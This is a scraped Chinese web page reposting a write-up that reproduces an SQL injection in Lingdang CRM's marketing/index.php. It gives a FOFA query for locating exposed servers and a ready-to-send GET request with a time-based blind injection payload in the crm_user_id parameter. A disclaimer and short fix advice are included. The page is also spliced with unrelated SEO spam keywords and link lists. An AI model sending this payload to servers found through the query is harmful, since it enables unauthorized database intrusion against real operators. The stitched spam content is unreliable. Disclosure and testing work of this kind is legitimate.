当前位置: 首页 > news >正文

昆明婚恋网站价格域名检测查询

昆明婚恋网站价格,域名检测查询,银川怎么做网站,菜市场做建筑设计图库的网站设计文章目录 灵当CRM index.php接口SQL注入漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现 0x06 修复建议 灵当CRM index.php接口SQL注入漏洞复现 [附POC] 0x01 前言 免责声明:请勿利用文章内的相关技…

文章目录

  • 灵当CRM index.php接口SQL注入漏洞复现 [附POC]
    • 0x01 前言
    • 0x02 漏洞描述
    • 0x03 影响版本
    • 0x04 漏洞环境
    • 0x05 漏洞复现
      • 1.访问漏洞环境
      • 2.构造POC
      • 3.复现
    • 0x06 修复建议

灵当CRM index.php接口SQL注入漏洞复现 [附POC]

0x01 前言

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

0x02 漏洞描述

灵当CRM致力于为企业提供客户管理数字化、销售管理自动化、服务管理智能化、项目管理一体化的个性化CRM行业解决方案,构建全生命周期的数字化管理体系。灵当CRM marketing/index.php接口存在SQL注入漏洞。

0x03 影响版本

灵当CRM

0x04 漏洞环境

FOFA语法: body=“ldcrm.base.js” && icon_hash=“436310201”
在这里插入图片描述

0x05 漏洞复现

1.访问漏洞环境

在这里插入图片描述

2.构造POC

POC (GET)

GET /crm/WeiXinApp/marketing/index.php?module=WxOrder&action=getOrderList&crm_user_id=1%20AND%20(SELECT%209552%20FROM%20(SELECT(SLEEP(5)))x) HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

3.复现

在这里插入图片描述

0x06 修复建议

建议关闭互联网暴露面或接口设置访问权限;升级至安全版本

http://www.yidumall.com/news/7714.html

相关文章:

  • 怎么创建免费的个人网站网店代运营收费
  • 蒙城网站建设14个seo小技巧
  • wordpress服务器配置网站优化关键词
  • 建站abc做网站好累百度推广管理
  • 揭阳企业建站系统网络营销做得比较好的企业
  • 校园网站制作网络竞价
  • 垂直b2c网站有哪些专业seo推广
  • 自动优化网站建设咨询国际羽联最新排名
  • 动态交互网站建设百度大全免费下载
  • 网站建设是什么关注公众号一单一结兼职
  • pc端宣传网站开发南昌seo搜索优化
  • 作图网站做课程表国际新闻最新消息今天军事新闻
  • div css网站源代码怎样在百度上推广
  • php语言网站开发公司北京网站优化快速排名软件
  • 商品网站做推广seo关键词是什么
  • 杭州自适应网站建设2022今天刚刚发生地震了
  • 帝国做网站是选择静态还是伪静态网站建设报价明细表
  • 嘉兴网站推广优化费用搜索广告优化
  • 做网站用的图片网站恶意点击软件
  • 创建网站的app同城发广告的平台有哪些
  • 山西省网站建设南京seo优化公司
  • 免费建站体验电脑优化大师
  • 安徽安能建设集团网站短网址链接生成
  • 不花钱怎么做网站运营b站推广网站2024
  • 网站开发版本号北京优化seo
  • 网站的内部链接如何做网络热词作文
  • 做网站公司赚钱吗网站搜索引擎优化诊断
  • 整合营销传播的效果表现为杭州seo网站推广排名
  • 网站开发一年费用总计上海排名优化推广工具
  • 青岛建设集团 招聘信息网站百度网盟官网